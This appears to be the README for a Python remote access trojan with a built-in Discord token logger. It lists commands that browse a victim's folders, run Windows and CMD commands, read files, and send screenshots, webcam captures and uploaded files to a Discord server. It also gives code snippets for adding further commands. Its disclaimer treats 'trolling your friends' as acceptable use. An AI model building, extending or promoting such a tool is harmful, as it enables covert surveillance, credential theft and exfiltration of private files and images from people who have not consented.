Don't use for malicious reasons. You can use it for reasons such as trolling your friends or learning from the code.
Usage: python {ip} {port}, Example: python 8080.
Client listens to by default. You can always change this. Server connects to given ip & port. Also has discord token logger.
===> Commands <===
"1": Used to view folders in specified directory.
"2": Used to send message box with message and title and get response.
"3": Execute Windows commands.
"4": View content of readable text files.
"5": Execute a link in web browser.
"6": Execute hotkey.
"7": Execute CMD commands.
"8": Take screenshot of victim PC and send to discord server.
"9": Take shot of victim webcam and send to discord server.
"10": Upload files of victim and send to discord. (upto 7mb).
You can always add more commands if you like.
Inside of the function, commandHQ() just below the command variable write the following code
if command == "{number}":
argument = input(format + "Enter argument: ") # Use this if you need an argument
message = str(["{name}", argument or ""])
message = message.encode()
ans = True
Now just below the incoming_message variable write the following code:
if incoming_message[0] == "{name}":
print(format + "Data received: {}".format(incoming_message[1]))
Replace {number} with your command prefix & replace {name} with your command name.
Inside of the while loop, just below the incoming_message variable write the following code
if incoming_message[0] == "{name}":
# Write your code
code = ""
end = str(['sfisd', code])
end = end.encode()
Replace {name} with your command name and make sure to set variable code's value to your function's end product.
That's the end!